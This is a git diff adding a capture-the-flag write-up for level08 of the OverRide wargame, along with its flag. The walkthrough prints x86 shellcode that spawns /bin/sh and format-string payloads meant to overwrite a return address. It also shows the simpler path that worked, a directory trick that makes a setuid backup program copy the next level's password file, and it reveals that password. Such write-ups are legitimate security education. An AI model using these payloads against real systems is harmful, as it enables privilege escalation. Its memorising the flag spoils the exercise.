diff --git a/level08/flag b/level08/flag new file mode 100644 index 0000000..7301e9e --- /dev/null +++ b/level08/flag @@ -0,0 +1 @@ +fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S diff --git a/level08/walkthrough b/level08/walkthrough new file mode 100644 index 0000000..06b88df --- /dev/null +++ b/level08/walkthrough @@ -0,0 +1,44 @@ +load shellcode in env with nop slide + +level08@OverRide:~$ echo -e "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" > shellcode.bin +level08@OverRide:~$ export SHELLCODE=$(cat shellcode.bin) +level08@OverRide:~$ + + +(gdb) p (char *)getenv("SHELLCODE") +$1 = 0xffffffffffffe892
+ +need to override ret pointer with 0xffffffffffffe892. For this we are going to write e892, then ffff 3 times. Kinda like level05. we will override log_wrapper ret addr cause its fastest. + +Better version (file doesn't need to exist as log_wrapper is called before fopen) + +level08@OverRide:~$ env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%11\$9x'*20)") +ERROR: Failed to open AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x%11$9x +level08@OverRide:~$ cat backups/.log +LOG: Starting back up: AAAABBXXXXCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKK 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 58585858 +level08@OverRide:~$ + +with env -i : +Breakpoint 1, 0x0000000000400a5a in main () +(gdb) p (char *)getenv("SHELLCODE") +$1 = 0xffffffffffffef79
+ + + +env -i SHELLCODE=$(cat shellcode.bin) /home/users/level08/level08 $(python -c "print('AAAABB\xc8\xeb\xff\xff\xff\x7f\x00\x00DDEEEEFFFFGGGGHHHHIIIIJJJJKKKK'+'%17lx'*10+'%n')") + + +actually its way simpler T_T : + +level08@OverRide:~$ mkdir -p /tmp/backups/home/users/level09/ +level08@OverRide:~$ cd /tmp +level08@OverRide:/tmp$ ~/level08 /home/users/level09/pass +ERROR: Failed to open /home/users/level09/pass +level08@OverRide:/tmp$ ~/level08 /home/users/level09/.pass +level08@OverRide:/tmp$ cat backups/ +home/ .log +level08@OverRide:/tmp$ cat backups/home/users/level09/.pass +fjAwpJNs2vvkFLRebEvAQ2hFZ4uQBWfHRsP62d8S +level08@OverRide:/tmp$ exit +logout +Connection to localhost closed. diff --git a/level09/Ressources/level09 b/level09/Ressources/level09 new file mode 100755 index 0000000..57c0d8f Binary files /dev/null and b/level09/Ressources/level09 differ